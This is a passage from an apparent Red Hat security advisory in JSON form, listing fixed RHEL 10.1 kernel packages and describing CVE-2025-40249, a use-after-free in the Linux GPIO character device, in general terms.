"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: HID: intel-thc-hid: intel-thc: Fix incorrect pointer arithmetic in I2C regs save"
},
{
"cve": "CVE-2025-40249",
"cwe": {
"id": "CWE-910",
"name": "Use of Expired File Descriptor"
},
"discovery_date": "2025-12-04T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418886"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel\u0027s GPIO (General Purpose Input/Output) character device. A local attacker with low privileges could exploit a use-after-free vulnerability. This occurs when a GPIO change event is emitted after a file descriptor\u0027s reference count has dropped to zero, but before its release callback is invoked. This could lead to privilege escalation or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Kernel: Use-after-free in GPIO character device allows privilege escalation or denial of service",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
